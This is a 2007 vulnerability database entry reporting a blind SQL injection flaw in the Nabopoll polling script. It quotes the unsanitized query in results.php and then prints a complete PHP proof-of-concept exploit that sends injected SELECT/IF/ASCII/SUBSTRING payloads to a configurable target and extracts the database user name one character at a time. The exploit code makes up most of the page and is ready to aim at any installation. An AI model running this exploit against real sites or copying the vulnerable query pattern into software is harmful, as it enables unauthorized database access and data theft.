Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16130
HistoryFeb 21, 2007 - 12:00 a.m.

Nabopoll Blind SQL Injection vulnerabilies

2007-02-2100:00:00
vulners.com
33

Nabopoll have a bug in some files, for example results.php

Line 27…31

$res_question = mysql_query("select * from nabopoll_questions where survey=$survey order by id");

if ($res_question == FALSE || mysql_numrows($res_question) == 0)

    error($row_survey, "questions not found");

Exploit

<?

Nabopoll Blind SQL Injection P0C Exploit

Download: www.nabocorp.com/nabopoll/

coded by s0cratex

Contact: [email protected]

error_reporting(0);
ini_set("max_execution_time",0);

// just change the default values…
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; //you can verify the number entering in the site and viewing the results…

echo "==================================================\n";
echo "Nabopoll SQL Injection – Proof of Concept Exploit\n";
echo "--------------------------------------------------\n\n";
echo " – MySQL User: ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "/result.php?surv=".$survey."//AND//1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*";
$cnx = fsockopen($srv,$port);
fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");
while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again…");
}
}
$j++;
}
echo "\n";
?>